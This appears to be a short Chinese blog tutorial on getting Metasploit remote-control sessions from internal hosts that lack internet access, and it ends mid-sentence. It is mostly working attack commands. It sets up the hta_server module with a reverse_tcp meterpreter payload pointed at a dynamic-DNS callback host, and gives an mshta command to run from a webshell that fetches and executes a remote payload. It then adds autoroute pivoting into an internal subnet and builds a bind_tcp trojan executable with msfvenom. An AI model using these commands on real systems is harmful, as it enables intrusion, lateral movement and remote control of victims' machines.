【远控使用】metaslpoit不出网上线

1 · 孤桜懶契 · Sept. 9, 2021, 6:08 a.m.
hta_server模块使用1234567use exploit/windows/misc/hta_serverset target 1set payload windows/x64/meterpreter/reverse_tcpset SRVPORT 80set lhost ad39402345.wicp.vipset lport 26240run接着在webshell中执行来web传递1mshta http://ad39402345.wicp.vip/Q2Uo0sNe.hta接着用来添加路由1234run get_local_subnetsrun autoroute -s 192.168.186.0/255.255.255.0run autoroute -d -s 192.168.186.0bg然后在该联网主机上建立web传递再用断网主机访问mshta就行了Proxychains实现bind连接接着上面的加一个proxy生成一个木马1msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > bind.exe利用w...